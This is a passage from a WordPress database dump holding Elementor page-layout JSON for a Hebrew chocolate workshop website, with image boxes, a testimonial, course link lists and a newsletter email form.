\\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(409,99,'_elementor_version','0.4'),(415,100,'_edit_last','1'),(416,100,'_edit_lock','1596644811:1'),(417,100,'_wp_page_template','elementor_header_footer'),(419,100,'_elementor_edit_mode','builder'),(421,102,'_menu_item_type','post_type'),(422,102,'_menu_item_menu_item_parent','379'),(423,102,'_menu_item_object_id','100'),(424,102,'_menu_item_object','page'),(425,102,'_menu_item_target',''),(426,102,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(427,102,'_menu_item_xfn',''),(428,102,'_menu_item_url','');
INSERT INTO `xrx_postmeta` VALUES (429,100,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2d61f2ce\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"16204688\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"571098c6\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd\",\"description\":\"\",\"button_text\":\"\",\"background_color\":\"#833ca3\",\"_id\":\"c001fa3\",\"background_image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_64864869_s-2019-1.jpg\",\"id\":448},\"background_size\":\"cover\",\"background_ken_burns\":\"\",\"zoom_direction\":\"in\",\"background_overlay\":\"yes\",\"background_overlay_color\":\"rgba(0,0,0,0.5)\",\"background_overlay_blend_mode\":\"\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"link_click\":\"slide\",\"custom_style\":\"\",\"horizontal_position\":\"\",\"vertical_position\":\"\",\"text_align\":\"\",\"content_color\":\"\",\"repeater_text_shadow_text_shadow_type\":\"\",\"repeater_text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"}}],\"slides_height\":{\"unit\":\"px\",\"size\":355,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6aef977\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"180b18f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b5e10b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d5\\u05d0 \\u05d0\\u05d7\\u05d3 \\u05de\\u05d4\\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd. \\u05d4\\u05d5\\u05d0 \\u05de\\u05e9\\u05ea\\u05dc\\u05d1 \\u05de\\u05e2\\u05d5\\u05dc\\u05d4 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05de\\u05e0\\u05d5\\u05ea \\u05d8\\u05e2\\u05d9\\u05de\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d4\\u05d5\\u05d0 \\u05de\\u05e9\\u05ea\\u05dc\\u05d1 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05de\\u05e0\\u05d5\\u05ea \\u05de\\u05dc\\u05d5\\u05d7\\u05d5\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05d5\\u05e0\\u05d5\\u05ea\\u05df \\u05e7\\u05d9\\u05e7 \\u05de\\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05dc\\u05de\\u05e0\\u05d4, \\u05d5\\u05d4\\u05d5\\u05d0 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05e1\\u05ea\\u05dd \\u05db\\u05da \\u05dc\\u05d1\\u05d3\\u05d5, \\u05d1\\u05dc\\u05d9 \\u05e9\\u05d5\\u05dd \\u05ea\\u05d5\\u05e1\\u05e4\\u05ea \\u05d1\\u05e6\\u05d3. \\u05d4\\u05d5\\u05d0 \\u05de\\u05e2\\u05dc\\u05d4 \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05de\\u05e9\\u05e4\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d4\\u05e8\\u05d2\\u05e9\\u05d4, \\u05d5\\u05d4\\u05d5\\u05e4\\u05da \\u05db\\u05dc 